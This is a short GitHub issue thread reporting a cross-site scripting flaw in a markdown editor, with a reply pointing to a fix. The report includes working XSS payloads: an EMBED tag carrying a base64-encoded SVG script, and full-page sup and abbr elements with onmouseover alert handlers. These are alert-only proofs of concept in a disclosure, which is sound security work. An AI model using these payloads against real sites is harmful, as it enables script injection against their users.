Open j1nse opened 4 years ago
Hi @shequ123, thanks for creating an issue for this! I opened a pull request implementing changes to fix these problems and it correctly blocks those scenarios from happening in the editor. Pull request: https://github.com/jbt/markdown-editor/pull/110
This label and attack vector will cause XSS. payload:
![xss3](https://user-images.githubusercontent.com/22301107/62463588-f8f43780-b7bc-11e9-8bb5-4337e6c2b5e6.PNG)
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIGlkPSJ4c3MiPjxzY3JpcHQgdHlwZT0idGV4dC9lY21hc2NyaXB0Ij5hbGVydCgieHNzISIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
<sup style="position:fixed;left:0;top:0;width:10000px;height:10000px;" onmouseover="alert('xss')">sup</sup>
<abbr style="position:fixed;left:0;top:0;width:10000px;height:10000px;" onmouseover="alert('xss')">abbr</abbr>
if you type the payload,the xss vulnerability will be triggered.